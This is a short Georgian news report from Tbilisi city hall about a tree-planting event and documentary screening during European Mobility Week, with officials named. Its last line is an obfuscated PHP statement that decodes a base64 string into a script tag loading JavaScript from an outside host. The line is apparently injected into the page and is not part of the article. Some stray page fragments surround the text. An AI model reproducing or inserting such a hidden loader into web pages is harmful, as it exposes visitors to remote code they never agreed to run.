celsiusi
ავერსი შნაიდერი

თბილისის მერიის გარემოს დაცვის საქალაქო სამსახურის ორგანიზებით, „ევროპის მობილობის კვირეულის“ ფარგლებში, მიცკევიჩის ქუჩა N25-ის მიმდებარედ არსებულ თარგებში გამწვანების აქცია ჩატარდა.

ღონისძიებაში მონაწილეობა ქართულ-ამერიკული სკოლის ეკოკლუბის მოსწავლეებმა მიიღეს. აქციის მონაწილეებს შპს „ეკოსერვის ჯგუფის“ თანამშრომლები დაეხმარნენ. გარდა ამისა, მიცკევიჩის ქუჩაზე, ღია ცის ქვეშ თომა ჩაგელიშვილის დოკუმენტური ფილმის „ენერგოეფექტურობა ძველი თბილისის არქიტექტურაში“ ჩვენება გაიმართა, ასევე, განთავსდა მერების შეთანხმების ინიციატივის საინფორმაციო სტენდები.

აღნიშნულ ღონისძიებებს გარემოს დაცვის საქალაქო სამსახურის უფროსის მოვალეობის შემსრულებელი პაატა ტოგონიძე და „ეკოსერვის ჯგუფის“ დირექტორი ვახტანგ ნოზაძე, საბურთალოს რაიონის გამგებელთან, გიზო ვასაძესთან ერთად დაესწრნენ.

თბილისის მერიის გარემოს დაცვის საქალაქო სამსახური, ენერგოეფექტურობის მიმართულებით ცნობიერების ამაღლების მიზნით, ევროპის მობილობის კვირეულს შეუერთდა.

დედაქალაქი 16-22 სექტემბერს „ევროპის მობილობის კვირეულს“ უმასპინძლებს, რომელსაც თბილისი მესამედ უერთდება. წლევანდელი კვირეულის თემაა „დაზოგე ენერგია“, ხოლო ღონისძიების მიზანი სხვადასხვა აქტივობის საშუალებით, მდგრადი ურბანული მობილობის შესახებ ცნობიერების ამაღლება, საზოგადოებრივი ტრანსპორტით, ფეხითა და ველოსიპედით გადაადგილების წახალისებაა.

ინფორმაციას თბილისის მერია ავრცელებს.

450
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");